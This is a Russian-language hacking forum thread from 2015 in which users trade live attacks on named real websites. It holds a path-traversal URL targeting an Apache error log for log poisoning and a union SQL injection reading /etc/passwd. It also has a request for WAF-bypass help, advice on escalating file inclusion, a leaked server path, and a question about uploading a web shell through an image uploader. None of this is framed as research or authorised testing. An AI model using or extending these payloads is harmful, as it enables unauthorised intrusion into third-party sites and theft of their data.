HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 04.06.2015, 11:06
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
С нами: 9721141

Репутация: 1013
По умолчанию

Цитата:
Сообщение от huntercs16  

Код:
http://esn.po.opole.pl/index2.php?dir=photo&id=../../../../../../../../../../../../../../../../../../../../../../var/log/apache2/error_log/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.&name=img_0160.jpg&site=photo_zoom
Вот тут реально нестандартный еррор лог. Что это?
это нестандартный еррор_лог. пробовали файлы сессии? лог ssh авторизации? сделать акк на сайте? найти ацес лог? есть ли возможность использовать врапперы? вообще в случае, когда на хосте крутится еще пара десятков сайтов стоит смотреть в их сторону

.SpoilerTarget" type="button">Spoiler: xek
 
Ответить с цитированием

  #2  
Старый 04.06.2015, 13:25
Br@!ns
Постоянный
Регистрация: 03.09.2010
Сообщений: 885
С нами: 8258006

Репутация: 25


По умолчанию

.SpoilerTarget" type="button">Spoiler
http://beadfxnew.dmt.net/classes/cl...1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17+--+

Помогите waf обойти
 
Ответить с цитированием

  #3  
Старый 04.06.2015, 21:19
Mister_Bert0ni
Участник форума
Регистрация: 10.05.2015
Сообщений: 142
С нами: 5795606

Репутация: 57
По умолчанию

Всем привет. Банальный вопрос:Если есть регистрация на сайте то значит сайт как то пишет регистрационные данные в базу.Но уязвимость sql в другом скрипте,например в index.php в параметре id.Так вот когда раскручиваешь скуль то оказывается что у current_user-а права только USAGE и подменить хэш админа он не может.Как так???? Получается что сайт записует данные от привелегирированого юзера??
 
Ответить с цитированием

  #4  
Старый 04.06.2015, 21:30
huntercs16
Участник форума
Регистрация: 07.10.2013
Сообщений: 140
С нами: 6630806

Репутация: 6
По умолчанию

Код:
http://filmfactor.pl/?st=-1+/*!uNIoN*/+%28/*!SelEcT*/+1,1,load_file('etc/passwd'),1,1,1,1,1,1,1+%29+--+;
Подскажите директорию в которой сайт лежит
 
Ответить с цитированием

  #5  
Старый 04.06.2015, 21:37
winstrool
Познающий
Регистрация: 06.03.2007
Сообщений: 59
С нами: 10095779

Репутация: 137
По умолчанию

Цитата:
Сообщение от huntercs16  

Код:
http://filmfactor.pl/?st=-1+/*!uNIoN*/+%28/*!SelEcT*/+1,1,load_file('etc/passwd'),1,1,1,1,1,1,1+%29+--+;
Подскажите директорию в которой сайт лежит
При вызове обычной sql ошибки, дается раскрытие путей:

Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /home/filmfactor/public_html/filmfactor/index.php on line 103
 
Ответить с цитированием

  #6  
Старый 05.06.2015, 15:54
Filipp
Участник форума
Регистрация: 10.05.2015
Сообщений: 251
С нами: 5795606

Репутация: 31
По умолчанию

Никто не подскажет, как можно залить шелл через самописный двигл, имеется спортанский набор: Загрузка файл JPG, PNG,GIF, и обычный HTML редактор. Пробовал пропихнуть шелл через картинку, ничего не получилось, картинка обрабатывается какой то php функцией, и не дает загружать любое другое расширение кроме выше описанных (Корректировка запроса не помогает, все равно срабатывает защита). Так же пробовал в гифку добовлять комментарий - результата 0. Так же в запросе я нашел местечко, куда сгружаются все заблокированные файлы, попробовал подставить, дало ошибку 403)) Так же заметил одну особенность, файлы загружается через SQL запрос. Может быть есть способы заливки шелла именно через HTML редактор, ведь туда что угодно впихнуть можно?
 
Ответить с цитированием

  #7  
Старый 05.06.2015, 18:05
Ravenous
Участник форума
Регистрация: 14.07.2012
Сообщений: 115
С нами: 7278806

Репутация: 26
По умолчанию

Ребя, нужен аналог плагина Live HTTP Headers, ибо он перестал работать ( на кнопку "Повтор" не регагирует). Нужно чтобы была возможноть POST переменные передавать строкой типа &a1=1&a2=2&a3=3, а не по отдельности забивать как в программе HttpReq например.
 
Ответить с цитированием

  #8  
Старый 05.06.2015, 18:55
Filipp
Участник форума
Регистрация: 10.05.2015
Сообщений: 251
С нами: 5795606

Репутация: 31
По умолчанию

Цитата:
Сообщение от Ravenous  

Ребя, нужен аналог плагина Live HTTP Headers, ибо он перестал работать ( на кнопку "Повтор" не регагирует). Нужно чтобы была возможноть POST переменные передавать строкой типа &a1=1&a2=2&a3=3, а не по отдельности забивать как в программе HttpReq например.
Burp Suite.
 
Ответить с цитированием

  #9  
Старый 05.06.2015, 19:22
winstrool
Познающий
Регистрация: 06.03.2007
Сообщений: 59
С нами: 10095779

Репутация: 137
По умолчанию

Цитата:
Сообщение от Ravenous  

Ребя, нужен аналог плагина Live HTTP Headers, ибо он перестал работать ( на кнопку "Повтор" не регагирует). Нужно чтобы была возможноть POST переменные передавать строкой типа &a1=1&a2=2&a3=3, а не по отдельности забивать как в программе HttpReq например.
HackBar
 
Ответить с цитированием

  #10  
Старый 05.06.2015, 20:45
Zen1T21
Участник форума
Регистрация: 13.01.2013
Сообщений: 157
С нами: 7015286

Репутация: 2
По умолчанию

Цитата:
Сообщение от Ravenous  

Ребя, нужен аналог плагина Live HTTP Headers, ибо он перестал работать ( на кнопку "Повтор" не регагирует). Нужно чтобы была возможноть POST переменные передавать строкой типа &a1=1&a2=2&a3=3, а не по отдельности забивать как в программе HttpReq например.
http://rghost.ru/8XjjrkDrr исправленный плагин

+

/threads/422049/
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Внести депозит

Введите сумму USDT:

Принимается только USDT TRC20. Fake/Flash USDT не засчитывается.

×

Вывести депозит

Сумма USDT:

Ваш USDT TRC20 кошелек:

Заявка будет отправлена администратору.